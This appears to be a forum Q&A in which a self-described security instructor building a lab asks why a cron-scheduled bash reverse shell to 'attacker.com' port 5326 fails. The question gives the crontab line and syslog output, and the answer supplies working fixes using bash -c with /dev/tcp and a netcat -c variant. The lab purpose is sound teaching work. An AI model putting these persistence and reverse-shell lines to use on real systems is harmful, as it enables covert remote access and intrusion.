I teach Cybersecurity at a university and am writing a lab on Netcat and reverse shells. I have created a cron job that runs a script that connects to my listener. That works fine. Problem is there is too much of a fingerprint with that and the script can be deleted. Part of the lab is on stealth operations (like putting a space in front of any command that is entered).
I am trying to get this command to execute. Right now the frequency isn’t important though eventually it will run on boot and every 30 minutes.
/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1
When run from the command line the command works and the reverse shell is established. I don’t want to use port 80 because I DO want this blocked if a student decides to attempt something stupid. Also the next lab is on iptables to block this port.
I’ve tried quotes. I’ve tried sudo. Double ampersands at the end. Single ampersands at the end. Further qualifications of the path to /tcp/. I don’t think I need to establish what tty session it’s run from (that would be tough). In no case is the cron-run command successful.
crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1
Here is the syslog
cat /var/log/syslog
Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)
It doesn’t appear to be failing ... it’s just not working.
So to the many many people smarter than I here, what am I doing wrong and how do I get this command to work as a cron job (calling a script is not an option)?
UPDATE: solution is * * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'
although there are two errors that I am still working on resolving.
/dev/tcp
bashismNote that /dev/tcp/host/port
is a bashism!
cron
will not understand them!
You could try:
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'
or use non bash way:
using netcat
for sample:
* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1
(See man nc.traditional
vs man nc.openbsd
)
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With